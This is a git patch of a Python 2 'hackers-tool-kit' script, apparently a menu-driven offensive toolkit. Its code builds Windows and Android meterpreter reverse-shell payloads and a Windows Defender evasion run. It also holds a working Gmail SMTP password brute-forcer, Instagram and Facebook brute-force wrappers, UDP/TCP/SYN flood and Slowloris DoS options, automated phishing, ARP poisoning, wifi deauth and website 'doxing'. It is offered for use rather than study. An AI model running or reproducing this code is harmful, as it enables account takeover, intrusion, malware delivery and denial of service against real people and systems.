and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - found = True -mainbanner() -main() From b2a54f429432f4935f717856d9b2889b69118a2c Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 22:42:53 +0100 Subject: [PATCH 039/214] Add files via upload --- htk.py | 2002 ++++++++++++++++++++++++++++++++++++++++++++++++++ htksecure.py | 16 + 2 files changed, 2018 insertions(+) create mode 100644 htk.py create mode 100644 htksecure.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..1384955 --- /dev/null +++ b/htk.py @@ -0,0 +1,2002 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] 